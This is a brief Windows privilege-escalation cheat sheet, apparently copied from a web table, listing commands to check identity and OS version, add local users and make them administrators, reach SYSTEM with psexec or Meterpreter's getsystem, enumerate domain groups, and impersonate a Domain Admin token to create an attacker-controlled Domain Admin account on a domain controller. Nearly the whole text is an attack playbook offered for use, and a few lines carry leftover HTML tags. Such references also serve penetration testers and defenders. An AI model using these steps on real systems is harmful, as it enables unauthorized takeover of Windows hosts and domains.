Check Who You Are
echo %USERDOMAIN%\%USERNAME whoami |
Check Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" |
Add a User
net user <username> <password> /add</password></username> |
Add a User to the Administrators Group
net localgroup administrators <username> /add |
Getting from Administrator to System
psexec -s cmd.exe |
Getting system with Meterpreter
getsystem |
(from the meterpreter shell)
Changing a Users Password
net user <username> <password> |
View Domain Groups
net group /domain |
View Members of Domain Group
net group /domain <Group Name> |
Add Member with Domain Admin
This attack is on the assumption you have obtained a meterpreter shell on a system and you’re lucky enough to have found a domain admin’s token.
impersonate_token <Domain>\\<Username> # The Domain Admin's Username add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker defined Username add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller> |
You should now have an account on the Domain Controller with Domain Admin privileges.